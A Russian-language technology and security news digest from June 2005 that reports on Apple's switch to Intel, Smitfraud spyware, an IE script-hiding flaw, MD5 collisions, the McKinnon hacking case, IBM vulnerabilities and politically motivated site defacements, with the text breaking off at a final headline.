По сообщениям из неофициальных источников, на пиратских софтверных сайтах и в файлообменных сетях появилась пиратская версия операционной системы Mac OS X 10.4.1 компании Apple, специально адаптированная для процессорной платфомы x86 компании Intel. Как известно, накануне глава Apple Стив Джобс официально подтвердил давно ходившие слухи о том, что платформа Macintosh в ближайшие годы будет переводиться с процессорных решений линейки PowerPC от IBM на процессоры Intel. Переход на другую архитектуру требует перестройки всего программного обеспечения, в первую очередь - операционных систем. По словам Джобса, секретные разработки ПО для "макинтошей", способного работать с аппаратурой Intel, ведутся уже несколько лет. 6 июня на конференции разработчиков ПО для платформы Macintosh WWDC-2005, когда было объявлено о переходе, Джобс продемонстрировал модель "макинтоша" с процессором Intel Pentium 4 3,6 гигагерц, который работал под управлением Mac OS X - следовательно, ОС уже была портирована на платформу Intel. Занимающийся вопросами высоких технологий американский блоггер Джефф Харрелл (Jeff Harrell), автор блога Shapeofdays.com, накануне обнародовал информацию о том, что в действующих образцах новых "макинтошей" установлены не только процессоры, но и материнские платы, а также графические карты от Intel. Из этого следует, что адаптированная под x86 система MacOS и другое ПО может также устанавливаться на компьютерах платформы PC, самой распространенной компьютерной платформы в мире, при работе с которой наиболее часто используются ОС Windows производства корпорации Microsoft. С учетом того, что пиратские копии Mac OS X 10.4.1 (модификация вышедшей в конце апреля Mac OS X 10.4 Tiger) для архитектуры Intel уже доступны, Харрелл делает вывод, что в ближайшее время следует ожидать того, что многие пользователи PC в экспериментальных целях попытаются установить у себя Mac OS X. При этом отмечается, что каких-либо проблем совместимости возникать не должно, и адаптированные программы для "макинтошей" будут также работать и на PC, в том числе прилагающийся к ОС пакет базовых рабочих инструментов iLife.
Подробности

12/06/2005 13:33 Разработчики сняли пробу с «Маков»-на-Intel
На прошлой неделе разработчики ПО для Apple допоздна обсуждали, сколько же им предстоит работы по переносу своих программ на «Маки» «Intel Inside». Сделав в понедельник свое историческое заявление, компания Apple Computer предоставила разработчикам возможность сориентироваться, организовав лабораторию «Маков»-на-Intel в рамках своей конференции Worldwide Developer Conference в Сан-Франциско. В понедельник и среду лаборатория работала до девяти вечера, в во вторник — аж до полуночи. И хотя заказчикам Apple начнет поставлять свои Intel-«Маки» только в будущем году, опытные машины разработчики смогут получить за $999 уже в этом месяце. Президент Fetch Software Джим Мэтьюз говорит, что его компания уже прошла через это при замене семейства процессоров Motorola 68000 на PowerPC в середине 90-ых, а также недавно — при переходе с OS 9 и OS X. Он благодарен Apple за то, что на этот раз она предупреждает разработчиков заранее. «В отличие от прошлых случаев, Apple дала нам много времени и оборудование для тестирования». Для разных разработчиков объем работы по переносу кода на новые «Маки» существенно различается. В программах, написанных уже после появления Mac OS X в среде Apple Cocoa, все изменения могут быть произведены буквально за несколько часов, а иногда и еще быстрее. «Мы уже перенесли свое приложение на Intel, — говорит генеральный директор Delicious Monster Software Уил Шипли. — Нам достаточно было одного щелчка кнопкой мыши. Это заняло около 40 секунд. На демонстрационных Intel-«Маках» здесь, на WWDC, все отлично работает».
ZDNet

12/06/2005 12:26 ICANN продлила контракт с VeriSign на поддержку домена .net
Сетевая компания VeriSign получила одобрение интернет-регулятора ICANN на управление третьим по популярности доменом верхнего уровня .net на повторный шестилетний срок, сообщает агентство Associated Press. Представители ICANN объявили, что контракт с VeriSign на поддержку домена, заканчивавшийся 30 июня, был накануне продлен. Это было сделано по итогам аудиторской проверки, которая должна была решить, выполняет ли компания условия, предъявляемые к администраторам доменов, и как ее подготовленность выглядит на фоне других соискателей администраторских прав. Независимая проверка показала, что VeriSign успешно справляется с обязанностями, в связи с чем права на домен по окончании контракта было решено у нее не отбирать. Для подтверждения статуса компании также необходимо получить одобрение Министерства торговли США, которое финансировало развитие американского Интернета в середине 90-х годов, затем передало полномочия ICANN, но оставило за собой право вето на ключевые решения. По данным агентства, в этом ведомстве поддерживают VeriSign и, вероятнее всего, подтвердят продление контракта.
Lenta.Ru

12/06/2005 10:48 15 Мбит/c по телефонной линии
Устройство Xgen7000, выпущенное компанией Alloptic, позволяет передавать данные по стандартной телефонной линии на скорости до 15 Мбит/c - значительно быстрее, чем допускают технологии семейства xDSL. Система обеспечивает возможность поставки жилым домам и офисам услуг высокоскоростного Internet-доступа, передачи IP-видео и голосовой связи. Xgen7000 работает в паре с оборудованием пассивных оптических сетей производства Alloptic, предназначенного для подведения каналов поддержки высокоскоростных сервисов к жилым районам или зданиям. Преобразование сигналов Xgen7000 в стандартные интерфейсы Ethernet производится с помощью медиаконвертеров, устанавливаемых у конечных пользователей. Как заявляют в Alloptic, Xgen7000 позволяет удлинить "последнюю милю" сетей высоскоростных сервисов с обычных 10 до 20 км. Оптическое оборудование Alloptic обеспечивает возможность параллельной передачи по одному и тому же кабелю данных на скорости до 1 Гбит/c, а также голоса по технологии TDM и аналогового видеосигнала.
"Открытые системы"

12/06/2005 10:33 В Интернете начал распространение новый шпион Smitfraud
Антивирусная лаборатория Panda Software сообщает о появлении Smitfraud, новой шпионской программы, заражающей файлы системы, что влияет на ее работу. Это вредоносное приложение скачивается на компьютер через другую шпионскую программу CWS.YEXE, которая размещена на большом количестве нелегальных веб-страниц. Кроме установки прочего вредоносного ПО, такого как Smitfraud, на компьютер, оно также устанавливает другие вредоносные приложения. При проникновении на компьютер Smitfraud устанавливает антишпионское приложение PSGuard. Он также создает несколько файлов. Один из этих файлов называется oleadm32.dll и является копией системного файла wininet.dll. Этот файл заражен вирусом W32/Smitfraud.A и пытается заменить собой оригинальный файл после перезапуска компьютера. Другой из файлов, создаваемых шпионской программой на компьютере, - wp.bmp. Он является изображением, имитирующим “голубой экран", выводимый при ошибке операционной системы Windows. Это изображение содержит текст, информирующий пользователя о том, что его компьютер заражен шпионской программой Smitfraud.c и рекомендующий просканировать компьютер программой, способной исправить проблему. Если пользователь запускает PSGuard, тот обнаруживает вредоносную программу (Smitfraud.c). Однако для того, чтобы удалить ее с компьютера, пользователь должен купить и зарегистрировать PSGuard.
Panda Software

12/06/2005 10:03 Армия США прячет свои серверы
Армия США планирует осуществить инициативу по консолидации и перемещению корпоративных серверов в региональные закрытые датацентры. Как стало известно, Минобороны США планирует создать 6 процессинговых центров, которые позволят повысить безопастноcть инфраструктуры и упростить управление машинами. Инициативу планируется осуществлять на протяжении года. По словам руководства отдела корпоративных технологий в армии США, для начала будут созданы первые четыре центра, затем еще два. Несмотря на то, что уже точно определено количество серверов и их расположение, руководство категорически отказалось обнародовать местонахождение датацентров. Также по словам военных чиновников окончательная миграция всей инфраструктуры будет завершена через год-полтора. Основная задача этих серверов - работа с электронной почтой, веб-сервисы, и хранение данных. Военные подчеркивают, что они могли бы использовать и обычные решения в правительственных центрах, однако, по их словам, информация, хранящаяся на этих машинах настолько секретна, что для них необходимо создать закрытые зоны.
Источник

12/06/2005 09:31 Киберугрозы мешают компаниям внедрять технические новшества
Некоторые компании отказываются от развития собственной IT-структуры, опасаясь угроз, распространяющихся в компьютерных сетях. К такому выводу пришли аналитики компании Gartner, сообщает сайт The Register. Они выявили основные типы угроз, вызывающих наибольшую озабоченность у противников IT-прогресса: небезопасность протокола IP-телефонии, распространение вирусов для мобильных устройств, создание так называемых Warhol Worms, способных моментально атаковать все доступные сети; небезопасность беспроводных сетей. «Многие компании не спешат внедрять высокопродуктивные технологии, такие как беспроводные локальные сети (WLAN) и системы IP-телефонии, поскольку часто слышат об исходящей с их стороны угрозе. Реальность такова, что атаки на системы IP-телефонии случаются редко. Меры по обеспечению безопасности IP-телефонии такие же, как и в случае с обычными онлайн-системами. Прослушивание каналов IP-телефонии — самая обсуждаемая тема. Однако вероятность такого прослушивания мала, поскольку для него нужен доступ к интранет-сетям на базе LAN и специалисты, способные расшифровывать данные», — рассказал аналитик Gartner Лоуренс Оранс (Lawrence Orans). Распространение мобильных вирусов в обозримом будущем в Gartner считают нишевой тенденцией, поскольку число смартфонов и КПК, постоянно подключенных к сети, остается низким. «Антивирусные вендоры видят огромный потенциал для получения прибыли от продажи решений для мобильных телефонов и КПК. Однако антивирусные продукты для таких устройств будут полностью неэффективными. Самым эффективным решением для нейтрализации мобильных вирусов будет их блокировка в сети», — считает вице-президент Gartner Джон Пескаторе.
VirusList

12/06/2005 09:28 Российские ультраправые развязали кибервойну против сайтов оппонентов
За последние сутки в российском сегменте Интернета было зафиксировано несколько "политических" взломов интернет-сайтов. Как передает SecurityLab.Ru, в настоящее время отсутствует штатная функциональность у еврейского информагентства Jewish.Ru и сайта правозащитной организацтии "Московская хельсинкская группа". По состоянию на середину дня субботы главная страница Jewish.Ru выдает сообщение об ошибке, а на странице "Московской хельсинкской группы" вывешено объявление о взломе, оскорбление в адрес администратора и указывается, что за акцию несут ответственность ультраправые национал-социалистические объединения, в частности - организация "Славянский союз", и приводятся ссылки на их сайты. На сайтах упоминаются другие взломанные ресурсы политических противников национал-социалистов и размещается объявление "о наборе хакеров в подразделение информационной войны". Там же описаны мотивы производимых информационных диверсий: "Наше подразделение информационной войны будет и в дальнейшем закрывать сайты пропагандирующие толерантность, коммунизм, иудаизм и прочие половые извращения на сексуальной почве". Как отмечает SecurityLab.Ru, ранее в Рунете не наблюдались подобные волны политических взломов. Обычно российские хакеры, в отличие от, например, китайских или американских, аполитичны и совершают взломы ради баловства или в рамках доказательства своей квалификации. Издание предполагает, что националисты могли вступить в сговор с одной из хакерских группировок. По данным издания, уже зафиксирована информация об ответном взломе одного из сайтов националистов. Экперты делают вывод, что в ближайшее время можно ожидать "кибервойны" в российской части Интернета между сторонниками радикальных политических группировок.
Источник

11/06/2005 16:17 GSM перестанут прослушивать с ведома спецслужб
Спецслужбы в России создали специальную федеральную подсистему конфиденциальной сотовой связи (СФПКСС), целью которой является полностью исключить возможность перехвата разговоров. В рамках федеральной подсистемы услуга «Конфиденциальная сотовая связь» предоставляется как для органов государственной власти, так и для коммерческих абонентов, желающих гарантированно закрыть конфиденциальную информацию. Базовым оператором для этой системы по результатам открытого конкурса была выбрана компания «Мегафон». Сейчас воспользоваться услугами защищенной мобильной связи могут только органы государственного управления и силовые структуры. Однако, кроме органов государственной власти, услугой планируют пользоваться банки, крупные строительные, нефтяные, машиностроительные компании и другие коммерческие абоненты. Всего, согласно данным рыночных исследований абонентами конфиденциальной GSM-связи могут стать до 10 тыс. человек.
Источник

11/06/2005 15:12 Блокирование типовых атак на web-приложения при помощи mod_security
В статье "Securing Web Services with mod_security" демонстрируются примеры использования apache модуля mod_security для защиты web-сервисов от некоторых видов атак, сообщает opennet.ru. Автором статьи является Shreeraj Shah.
Cтатья

11/06/2005 14:02 Очередное доказательство возможности взлома MD5
Ранее мы сообщали о работах и исследованиях, в которых их авторы демонстрировали возможность взлома алгоритма формирования хэшей MD5, а также SHA-0/1. Особенно здесь прославились китайские криптоаналитики (исследователи компьютерной безопасности) - например, широко известны статьи о возможности взлома MD4, MD5, SHA X. Wang. Суть исследований сводилась к доказательству того, что совершенно разные блоки данных (текстовые документы, например) могут иметь одинаковые хэши - то, что на языке криптоаналитиков называется хэш-коллизией. До сих пор не удавалось, тем не менее, получить более-менее осмысленный документ, который бы мог подменить истинный (хотя ранее Kaminski и Mikle демонстрирровали исполняемые файлами с одинаковыми хэшами, а Lenstra, Wang и de Weger продемонстрировали 2 сертификата X.509). Однако недавно появилась доольно интересная совместная работа исследователей из немецкого института криптологии и IT-безопасности CITS и университета в Маннхейме под названием "Attacking Hash Functions by Poisoned Messages "The Story of Alice and her Boss". В ней авторы приводят вполне осмысленные документы формата PS (Postscript), которые имеют одинаковые хэш-функции. Таким образом, теперь полностью подтверждена практическая возможность взлома MD5.
Работа

11/06/2005 13:37 В Internet Explorer завелся "призрак"
Студент университета Антверпена Паскаль Винк (Pascal Vyncke) обнаружил новую особенность браузера Microsoft Internet Explorer 6 с установленным SP2 под Windows XP. Особенность позволяет скрывать от глаз пользователя элементы веб-страницы, которые при этом вполне корректно выполняются. Уязвимость получила название «Призрак JavaScript» (JavaScript Ghost). Она позволяет размещать на странице вредоносный (или рекламный) код на языке сценариев JavaScript, который невозможно отследить даже при просмотре исходного текста документа в виде HTML, пишет Hackinthebox.org.
Описание

11/06/2005 12:55 В России запущен корневой центр ЭЦП
Закон "Об электронной цифровой подписи", принятый три года назад, пока не приносил существенной пользы. ЭЦП не имела юридической силы. Был необходим корневой удостоверяющий центр. Сегодня его наконец открыли. Федеральное агентство по информационным технологиям "Росинформтехнологии", являющееся уполномоченным федеральным органом в области использования ЭЦП, наконец открыло корневой (он же – головной) удостоверяющий центр. Он начал свою работу на базе НИИ "Восход". В соответствии с законом, чтобы подпись была признана юридически действительной удостоверяющий центр, который ее выдал, должен быть занесен в единый государственный реестр. Ведение такого реестра и возлагается, как одна из главных функций, на открывшийся центр. С конечными получателями ЭЦП он работать не будет. По данным "Росинформтехнологии", сегодня насчитываются 150 локальных удостоверяющих центров по всей России, однако эффективное использование ЭЦП , выдаваемых ими, так и не было развито. Некоторые компании использовали ЭЦП для своих частных нужд, однако на уровне взаимодействия с властью эти подписи не работали, так как не было единого реестра.
Более подробно

11/06/2005 12:51 Microsoft представила собственный профессиональный графический пакет
Компания Microsoft представила опытную версию своего профессионального пакета для работы с графикой, который, по утверждению интернет-издания CNET News, будет позиционироваться на рынке как конкурент самого популярного аналогичного программного решения - пакета Photoshop фирмы Adobe. Microsoft заявляет, что в новом продукте, который получил предварительное название Acrylic, будут сочетаться элементы как растрового, так и векторного редактора, что позволяет сделать вывод о том, что производитель Windows намеревается потеснить на рынке также популярный векторный продукт Illustrator той же Adobe. Acrylic разрабатывается на базе графической системы Expression разработки гонконгской компании Creature House, которую Microsoft купила в 2003 году. Acrylic будет поддерживать форматы, с которыми работает Photoshop, а также в нем вводится новый тип графического документа XPR. На сайте представлена бета-версия продукта объемом 77 мегабайт, которую можно бесплатно скачать, зарегистрировавшись в службе Microsoft Passport. Бета-версия имеет ограниченный срок функциональности до 1 октября.
Подробнее

11/06/2005 12:08 Буш требует продления разрешения на контроль интернета и прослушивание мобильников
В четверг президент США Джордж Буш потребовал продлить действие антитеррористического закона, известного как "Патриотический акт" (Patriot Act), сообщает РИА "Новости". Принятый конгрессом США после терактов 11 сентября 2001 года закон разрешает прослушивание мобильных телефонов, контроль за интернетом, включая электронную почту, а также обеспечивает борьбу с "компьютерным шпионажем". Это заявление Джордж Буш сделал в штате Огайо, выступая перед офицерами-выпускниками полицейской академии. Одним из особо важных для правоохранительных органов инструментов президент назвал переходящее прослушивание телефонов. Такая "прослушка" позволяет спецслужбам следить за всеми видами электронной связи подозреваемых лиц, даже если они все время меняют свои электронные устройства или мобильные телефоны. В продлении действия, по мнению Буша, нуждаются критически важные положения "Патриотического акта", направленные на борьбу с такими высокотехнологичными угрозами, как компьютерный шпионаж и кибертерроризм. Буш отметил также, что "Патриотический акт" защитил провайдеров доступа в интернет, добровольно предоставляющих информацию федеральным властям о сообщениях электронной почты угрожающего содержания. До появления этого закона провайдеры-осведомители сталкивались с риском судебных исков.
Подробности

11/06/2005 11:42 Microsoft подготовила новую серию заплаток для своих продуктов
В ближайший вторник корпорация Microsoft намерена выпустить десять бюллетеней безопасности, содержащих информацию о новых уязвимостях в различных версиях операционных систем Windows и других программных продуктах. Как сообщается в предварительном уведомлении, в ОС Windows обнаружены семь дыр различной степени важности. По крайней мере одна брешь охарактеризована как критически опасная. Теоретически эта уязвимость может использоваться злоумышленниками для получения несанкционированного доступа к удаленным компьютерам. Еще одна дыра выявлена в почтовом сервере Microsoft Exchange. Брешь считают опасной: она также может применяться с целью запуска на удаленном компьютере вредоносного кода. Правда, успешное проведение атаки возможно только при условии выполнения определенных операций самой жертвой (например, открытие файла). Наконец, еще две дыры, охарактеризованные софтверным гигантом как умеренно опасные, содержатся в пакете Microsoft Services for UNIX (предназначен для обеспечения совместимости компьютеров, работающих под управлением Windows и различных версий Unix и Linux), а также сервере ISA (Internet Security and Acceleration Server). Помимо патчей для дыр, корпорация Microsoft намерена выпустить обновленную модификацию утилиты Windows Malicious Software Removal Tool. Это распространяющееся бесплатно приложение предназначено для очистки компьютеров, работающих под управлением Windows, от наиболее опасных вредоносных программ, таких как Blaster, Sasser, MyDoom, DoomJuice и Zindos.
Уведомление

11/06/2005 11:25 Интерактивные программы в скриптах UNIX
На сайте opennet.ru опубликована довольно интересная (и, наверняка, полезная для многих) статья о применении интерактивных программ в скриптах ОС *nix, автором которой является Михаил Захаров. Зачастую администнраторам приходится писать подобные скрипты для взаимодействия с интерактивными программами и утилитами, к которым можно отнести: telnet, ftp, su, passwd, ssh. Интерактивность программ таит в себе множество подводных камней, которые не встречаются в программировании рядовых shell-скриптов. Работе с подобными программами в скриптах как раз и посвящена эта статья.
Статья

11/06/2005 11:01 Microsoft готовит инструментарий для Longhorn
В этом году Microsoft начнет наполнять рынок приложений для Windows Longhorn, предложив инструменты разработки и собственные серверные программы, включая долгожданное обновление среды программирования Visual Studio и SQL Server. В сентябре на конференции Professional Developers Conference (PDC) Microsoft представит новые инструменты для Visual Studio 2005, нацеленные на то, чтобы инициировать создание Longhorn-приложений. О планах выпуска новых продуктов, включая новые версии Exchange и BizTalk, руководители компании рассказали на проходившей на этой неделе в Орландо (штат Флорида) конференции Microsoft TechEd. Microsoft надеется, что приложения, использующие новые возможности Windows, такие как новый пользовательский интерфейс или поддержка веб-сервисов, помогут подтолкнуть заказчиков к обновлению Windows. В начале этого года компания выпустила комплекты разработчика, так называемые technology previews, для создания Windows-приложений, использующих механизм представления данных Longhorn Avalon и систему коммуникаций Indigo. Эти инструменты войдут в Visual Studio. «Сегодня создавать приложения для Longhorn, пользуясь Avalon technology preview, не так легко, как хотелось бы, — признал директор по маркетингу SQL Server Илья Букштейн. — В сентябре на PDC вы узнаете много нового о том, как мы намерены помочь программистам». После выпуска Longhorn в конце 2006 года Microsoft планирует предложить новую версию Visual Studio с кодовым названием Orcas, оптимизированную для создания Longhorn-приложений. Кодовое название следующего после Orcas релиза — Hawaii. Крупнейший выпуск продуктов 2005 года состоится в ноябре, когда компания представит инструменты программирования Visual Studio 2005 и СУБД SQL Server 2005. В понедельник руководители Microsoft сказали, что Visual Studio 2005 позволит разработчикам создавать приложения, используя в качестве интерфейса программу e-mail и календаря Outlook. До этого компания говорила, что при помощи Visual Studio Tools for Microsoft Office System можно будет писать приложения только для Word и Excel.
Подробности

11/06/2005 10:28 Секретные адреса американских компьютеров может узнать любой желающий
В ходе выяснения обстоятельств дела безработного британского системного администратора Гари Маккиннона (Gary McKinnon), который обвиняется властями США в осуществлении "самого масштабного взлома военных сетей в истории", корреспонденту "Ленты.Ру" удалось установить, что сетевые IP-адреса американских военных компьютеров с привязками их к конкретным военным базам может узнать любой пользователь Интернета, несмотря на то, что сам Пентагон старается эти данные не афишировать. Обнаружилось, что при поиске через самую популярную мировую поисковую систему Google информации по запросу, совпадающего с именем хакера - "Gary McKinnon" - первым документом выдается PDF-файл, содержащий обвинительное заключение властей США против Маккиннона. Документ находится на сайте публичной американской правовой базы FindLaw.com. В документе содержится описание злоумышленной деятельности лондонского безработного, которую он осуществил, несканкционированно вторгшись в американские военные сети. Как ранее сообщалось, в 2001 и 2002 году он проник в несколько компьютеров Пентагона и NASA, произвел деструктивные действия и похитил секретные документы. Он нанес военному ведомству ущерб на 5 тысяч долларов, а впоследствии на восстановительные и следственные мероприятия был потрачен миллион долларов. В минувший вторник Маккиннон был задержан в Лондоне, а затем отпущен под залог. В случае его выдачи США ему грозит тюремное заключение на срок до 70 лет. В обвинительном заключении содержится список IP-адресов компьютеров, которые Маккиннон незаконно взломал, с приложенным списком военных баз, к которым каждый адрес относится. Согласно правовым нормативам, подобная информация является закрытой, для чего в обвинительном заключении, выложенном в открытый доступ на FindLaw.com, указанные адреса были закрашены черным цветом. Однако корреспонденту "Ленты.Ру" удалось выяснить, что если провести с этими данными простейшую компьютерную операцию "скопировать и вставить" (copy-paste), воспользовавшись программой для чтения PDF-файлов Adobe Acrobat Reader и вставив скопированный текст в любой текстовый редактор, IP-адреса оказываются видны всем желающим. Всего в документе упоминается около 100 закрашенных черным цветом IP-адресов. Cудя по всему, подобное возможно из-за технической неграмотности составителя PDF-документа.
Обсуждение в ЖЖ

9/06/2005 20:00 Автор "крупнейшего военного взлома" искал в Пентагоне доказательства существования инопланетян
Британец Гари Маккиннон (Gary McKinnon), арестованный накануне в Лондоне по запросу властей США, которые подозревают его в совершении "самого крупного взлома военных сетей всех времен", выпущен рассматривающим его дело судьей под залог, сообщает BBC News. США объявили Маккиннона, системного администратора, известного в Сети под прозвищем Solo, в международный розыск, обвинив его в том, что он несанкционированно вторгся в 97 компьютеров американского министерства обороны и аэрокосмического агентства NASA в 2001 и 2002 году. США заявляют, что именно Маккиннон стоит за взломом сети на базе Форт-Майер в штате Вирджиния, когда в результате действий хакера, сумевшего получить права администратора, была стерта информация о 1300 локальных пользователях, важные системные файлы, были похищены содержащиеся во внутренней сети секретные данные, а на несколько машин были установлены "трояны". 39-летний Маккиннон, который сейчас живет в северной части Лондона и нигде не работает, был выпущен до 27 июля - на это число назначены судебные слушания по вопросу о его экстрадиции в США. Его адвокат Карен Тоднер (Karen Todner) в среду заявила прессе, что будет добиваться отрицательного решения, так как "вызывает опасения практика совершения правосудия над другими британскими гражданами в США". По ее мнению, Маккиннона необходимо судить в Великобритании. В случае экстрадиции в США Маккиннон может быть приговорен к тюремному заключению на срок до 70 лет. Тоднер сообщила, что он признает факт взлома, однако утверждает, что мотивом было желание "попытаться проверить факт существования иноплатетян" (как известно, в мире циркулируют слухи о секретных экспериментах с пойманными инопланетянами на американских базах), а также продемонстрировать недостатки в системах безопасности военных сетей.
Источник

9/06/2005 15:17 Очередное обновление безопасности MacOS
Выпущено очередное обновление системы безопасности для MacOS от фирмы Apple. Обновление носит индекс - Security Update 2005-006. Как написано в бюллетене, утраняются 11 уязвимойте как в самой ОС, так и в ПО, поставлемом в составе дистрибутива. Обновления выпущены для ОС - Mac OS X 10.3.9, 10.4.1.
Бюллетень

9/06/2005 14:34 Российских спамеров снова преследуют по закону
Рабочая группа Проекта "АнтиСпам" направила заявление в Федеральную антимонопольную службу (ФАС), в котором указала на факты нарушения ФЗ "О рекламе" со стороны компании, предлагающей услуги по рассылке спама. В заявлении был указан ряд признаков, по которым произошло нарушение закона, а именно: "скрытая реклама", "недостоверная реклама" и "неэтичная реклама". К сожалению, российское законодательство пока не дает эффективной возможности привлечь спамеров к ответственности непосредственно за рассылку спама. В то же время, в ходе своей деятельности спамеры часто нарушают ряд законодательных норм, поэтому привлечь их к ответственности все-таки возможно. Именно этой теме был посвящен доклад членов Рабочей группы Проекта "АнтиСпам" на V Международной конференции "Право и Интернет". Первая попытка подтвердить теорию практикой была предпринята в конце 2003 года, когда Рабочая группа Проекта "АнтиСпам" направила аналогичное заявление в Министерство по антимонопольной политике и поддержке предпринимательства (МАП) в отношении т.н. "Российской информационной сети". Одновременно ведущий сайта "Интернет и Право" Антон Серго направил в МАП заявление в отношении "Центра американского английского". В последние дни своего существования МАП дал формальный ответ на заявление Рабочей группы Проекта "АнтиСпам", оставив спамеров безнаказанными. Аналогичная судьба постигла и заявление Антона Серго. Единственным положительным следствием первой в России попытки преследования спамеров по закону явилось прекращение рассылок со стороны "Российской информационной сети", чего, к сожалению, нельзя сказать о рассылках "Центра американского английского". Комментируя повторную попытку привлечь спамеров к ответственности с помощью госорганов, осуществляющих контроль в области рекламы, координатор Проекта "АнтиСпам" Евгений Альтовский отметил, что из нового заявления исключены те пункты, которые позволили МАП обойтись формальным ответом. "Теперь мы указываем только на два прямых нарушения ФЗ "О рекламе" и один факт, который может быть расценен как нарушение, а к заявлению приложены документы, подтверждающие все изложенные в нем факты", - сказал Альтовский, - "Если ФАС удовлетворит заявление и оштрафует спамеров, то в России наконец появится практическая методика борьбы с распространителями незапрошенной информации. Угроза заплатить штраф в размере до 500 МРОТ за каждую рассылку сделает спам экономически невыгодным".
Подробности

9/06/2005 14:21 IBM установит контроль над учетными записями пользователей
Компания IBM разрабатывает программное обеспечение для борьбы с хищением идентификационных данных в онлайне. Новая разработка будет базироваться на грядущей версии Tivoli Identity Manager — 4.6, сообщает сайт vnunet.com. По словам разработчиков, релиз новой программы намечен на третий квартал текущего года. Продукт обеспечит более легкий способ создания и удаления учетных записей пользователей. Кроме того, программа позволяет создавать централизованные отчеты, на основе которых администратор сети может проверять, отвечают ли учетные записи требованиям безопасности. В состав программы входит симулятор. С его помощью администратор может заранее оценить, какие пользователи получат доступ к критически важным приложениям в случае изменения настроек доступа, а какие окажутся заблокированными. Среди многочисленных методов хищения идентификационных данных в онлайне часто используется контакт с одним из сотрудников компании, которой интересуются преступники. Разработка IBM позволит руководству компаний гибко управлять полномочиями пользователей по доступу к конфиденциальной информации.
Источник

9/06/2005 13:39 Ru-Center запустил новый DNS-сервер
Ru-Center (АНО «Региональный Сетевой Информационный Центр») объявил о том, что у его клиентов, пользующихся услугой Secondary, появились новые возможности: теперь в рамках этой услуги предоставляется не один, а два DNS-сервера, один из которых (ns4.nic.ru) размещен на технологической площадке MSK-IX в ММТС-9 в Москве, а второй, новый, (ns8.nic.ru) — в дата-центре амстердамской точки обмена трафиком (AMS-IX) в Нидерландах. При этом стоимость услуги осталась без изменений. Компания заверяет, что наличие сервера в Амстердаме повысит надежность обслуживания доменов клиентов, безопасность и стабильность российского сегмента сети в целом (следовательно, и эффективность, и надежность работы российских интернет-ресурсов), а также скорость доступа к интернет-ресурсам для заграничных пользователей и разгрузит серверы российского сегмента Интернета.
Подробнее

9/06/2005 13:16 Российские эксперты нашли "дыры" в продуктах IBM
Российские эксперты обнаружили уязвимости в продуктах IBM — IBM WebSphere Application Server и IBM AIX 5.3. Уязвимость в IBM WebSphere Application Server 5.0 позволяет удаленному пользователю вызвать переполнение буфера и выполнить произвольный код на целевой системе. Две «дыры» находятся в административной консоли сервера, переполнение буфера возникает при обработке данных в кодировке Unicode при включенной опции global security option. Удаленный пользователь может послать специально сформированные данные на порты 9080 (HTTP), 9090 (HTTP) и 9043 (HTTPS) приложения. Уязвимости присвоен рейтинг опасности «высокая», эксплойта для ее использования пока нет. Уязвимость в IBM AIX 5.3 позволяет локальному пользователю повысить свои привилегии на системе. Уязвимость существует в области команд invscout, paginit, diagTasksWebSM, getlvname, swcons, penable, pdisable, pstart, phold, pdelay и pshare. Локальный пользователь может послать уязвимым командам специально сформированную строку и выполнить произвольный код на целевой системе. Уязвимости присвоен рейтинг опасности «средняя», для ее использования есть эксплойт.
Источник

9/06/2005 12:45 Windows XP без встроенного медиаплеера выйдет 15 июня
Корпорация Microsoft подчинилась требованиям Еврокомиссии и объявила о выходе новой версии своей операционной системы Windows, ориентированной на продажу на территории Евросоюза, сообщает агентство Reuters. Специфической особенностью "европейской" версии ОС станет отсутствие встроенного проигрывателя Windows Media Player, что связано с постановлением антимонопольных органов. Объявлено, что производители ПК в Германии, Франции, Великобритании, Италии и Испании получат Windows без медиаплеера уже 15 июня, а продажа коробочных версий ОС под названием Windows XP N начнется 1 июля текущего года. Cборщики ПК и пользователи будут самостоятельно выбирать, какой медиаплеер устанавливать. Решение, вынесенное европейскими антимонопольными властями в марте 2004 года, требует от софтверного гиганта не только предоставить заинтересованным фирмам информацию о своих серверных технологиях, но и изъять из ОС Windows проигрыватель Media Player. Последнее было решено в рамках жалоб со стороны конкурирующих компаний, таких как RealNetworks и Apple, которые обвиняли Microsoft в использовании своего монопольного положения на рынке Ос для продвижения медиаплеера. Кроме того, тогда, за нарушение антимонопольного законодательства софтверному гиганту пришлось выплатить штраф в размере 497,2 млн. долларов США.
Подробности

9/06/2005 12:03 Microsoft предлагает браузинг во вкладках — для IE 6
Пообещав добавить вкладки в будущую версию своего браузера IE 7, Microsoft решила все же обеспечить долгожданную функцию уже в IE 6 — через панель инструментов MSN. Выпущенная в среду версия MSN Search Toolbar наделяет IE 6 способностью показывать в одном окне множество страниц, которые можно выбирать при помощи ярлычков, расположенных вверху окна. Эта функция — уже давно обеспечиваемая конкурирующими браузерами Opera, Safari и Firefox, а также оболочками, работающими поверх IE, — одна из многих недостающих технологий устаревающего IE 6. Microsoft не обновляла свой браузер больше трех лет. В прошлом месяце компания подтвердила слухи о том, что она предложит браузинг во вкладках в будущей версии IE 7. А в ноябре Microsoft заявила о возможности расширения функциональности IE 6 посредством дополнительных модулей, таких как панели инструментов, однако не раскрыла никаких конкретных планов выпуска таких модулей.
Подробности

8/06/2005 16:38 Подмосковная милиция перехватила "чипованные" игровые приставки
В Солнечногорском районе Московской области оперативниками МВД была пресечена реализация незаконно модифицированных ("чипованных") игровых приставок, предназначенных для использования нелицензионного программного обеспечения, сообщает в среду агентство РИА "Новости". Как пояснил РИА источник в правоохранительных органах Московской области, "экспертиза установила, что в изъятых игровых приставках изменены технические характеристики в электронной схеме". Тип игровых приставок не уточняется. По данному факту следственным отделом при ОВД города Солнечногорска возбуждено уголовное дело по статье 273 УК РФ ("создание и использование вредоносных программ"). Эта акция была проведена в рамках крупной операции отдела по борьбе с преступлениями в сфере высоких технологий (отдела "К") ГУВД Московской области по пресечению распространения контрафактного программного обеспечения на различных видах носителей. "Подмосковные оперативники получили информацию о том, что группа неизвестных через различные организации занимается распространением нелицензированного программного обеспечения на CD и DVD-дисках", - сообщил источник РИА.
РИА "Новости"

8/06/2005 16:05 Microsoft обновила Windows Update
